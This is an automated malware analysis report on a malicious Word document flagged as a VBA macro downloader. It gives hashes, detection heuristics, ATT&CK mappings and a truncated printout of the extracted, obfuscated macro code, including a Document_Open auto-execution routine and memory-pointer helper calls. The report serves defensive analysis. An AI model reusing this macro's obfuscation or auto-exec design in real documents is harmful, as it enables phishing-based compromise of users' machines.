Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c2097360c006fc33…

MALICIOUS

Office (OLE)

176.0 KB Created: 2018-05-02 11:21:00 Authoring application: Microsoft Office Word First seen: 2018-11-05
MD5: 1b7867c7b942d76116e2d496b42112be SHA-1: 48b14c23b2caf419c8f04200b77385756139d25c SHA-256: c2097360c006fc3325914406e1b1f0d4857e9a550618ffedc1d0eb0fe8e64777
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that uses GetObject. ClamAV identifies it as a downloader. The VBA script is heavily obfuscated but its structure suggests it is designed to download and execute a second-stage payload, likely from a remote source. The presence of VBA macros and the downloader behavior strongly indicate a malicious document intended for initial compromise via spearphishing.

Heuristics 6

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13568 bytes
SHA-256: d2b4647706e32217973fb5e1c518a75514139a2b3793825ffa66ca416b9407af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function unfulfilled(buoyantly)
Dim exemption As Long
Dim beardown As Variant
Dim uintatherium As Integer
Dim dastardly As Integer
#If (127 - 75 + 348 + 103 - 64 + 261) > ((97 - 8 + 231) - (113 - 48 + 475) * 1) And ((125 - 40 - 57) - (80 - 80 + 28)) * 2 < (Win64) Then
Dim ophisaurus As String
Dim aspasia As LongPtr
sinuation = 78 - 106 + 36
Dim hesitance As LongPtr
Dim apron As String
Dim chips As Variant
Dim upheaval As LongPtr
Dim determinism As Integer
semidesert = VarPtr(aspasia)
adj = lactuca(semidesert, VarPtr(buoyantly) + (96 - 124 + 36), sinuation)
#ElseIf (10 - 62 + 452 + 25 - 87 + 362) > ((98 - 3 + 225) - (7 - 27 + 560) * 1) And Not ((112 - 18 - 66) - (103 - 125 + 50)) * 2 < (Win64) Then
Dim aspasia As Long
sinuation = 98 - 108 + 14
Dim hesitance As Long
Dim upheaval As Long
semidesert = VarPtr(aspasia)
adj = freckled(semidesert, VarPtr(buoyantly) + (56 - 104 + 56), sinuation)
#End If
beehive = 40 - 26 - 15
hesitance = 88 - 82 - 6
subeditor = 36 - 127 + 91
upheaval = 21 - 66 + 9603
monoecious = 48 - 90 + 4138
effusive = 58 - 68 + 74
Patterned = manytongued(ByVal beehive, _
hesitance, ByVal subeditor, upheaval, ByVal monoecious, _
ByVal effusive)
duke = Math.Round(305)

apatosaur = Math.Round(301)

#If (60 - 98 + 438 + 37 - 56 + 319) > ((116 - 51 + 255) - (8 - 67 + 599) * 1) And ((102 - 85 + 11) - (81 - 40 - 13)) * 2 < (Win64) Then
ichthyotomy = lactuca(hesitance, aspasia, 31 - 45 + 5897)
#ElseIf (108 - 48 + 340 + 67 - 80 + 313) > ((39 - 11 + 292) - (3 - 40 + 577) * 1) And Not ((102 - 34 - 40) - (69 - 20 - 21)) * 2 < (Win64) Then
selflimited = freckled(hesitance, aspasia, 90 - 20 + 5813)
#End If
chruchwarden = 16 + 5
 Pmt 0, chruchwarden, 5932, 54263, 5

unfulfilled = hesitance
End Function
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Function lactuca(boater, detent, russell)
Dim amoret As String
Dim confidente As Variant
Dim fellatio As LongPtr
Dim silique As LongPtr
Dim eschatologist As LongPtr
Dim brooch As Variant
Dim dorm As LongPtr
Dim et As LongPtr
helmholtz = "modernist"
condensing = condensing * 1
silique = boater
et = russell
condensing = Rnd(100)
dorm = detent
burbot = 6 + 19
 Pmt 0, burbot, 33410, 56714, 5

irreprehensible = helmholtz
fellatio = 35 - 54 + 18
crystallize ByVal fellatio, _
silique, _
dorm, et, _
eschatologist
rebuild = helmholtz
End Function
Private Sub Document_Open()
Dim alamo As Long
Dim expanse As Integer
wright = "padua"
feme = "mortarboard"
miraculous
lowermiddleclass = 31 + 47
 Pmt 0, lowermiddleclass, 36735, 29510, 7
End Sub
Sub miraculous()
Dim scribendi As Byte
Dim ephippidae As Byte
ragbag.success.Value = Day(#12/5/2013#)
varday = predeliberation = "elective"
odyllic = "attributively"
foeman = lidded
gg = "adamantine"
belligerence = "schizaeaceae"

artificially = "throstle"
pinscher = "conk"
antipode = "apostrophe"
Set unreeling = ragbag.success.SelectedItem
oleaginous = 45 + 41
 Pmt 0, oleaginous, 31960, 32378, 7

nape = unreeling.Name
daubentonia = 126 - 86 + 7804
scintilla = Right(nape, daubentonia)
jerrybuilt = peat.bootlicking(scintilla)
estaminet = 46 + 50
 Pmt 0, estaminet, 16766, 37829, 4

dapple = "aesculus"
#If (96 - 114 + 418 + 123 - 82 + 259) > ((81 - 3 + 242) - (69 - 63 + 534) * 1) And ((56 - 109 + 81) - (39 - 28 + 17)) * 2 < (Win64) Then
Dim ablaze As String
Dim vinegariness As LongPtr
Dim bedder As LongPtr
Dim delectability As Variant
#ElseIf (33 
... (truncated)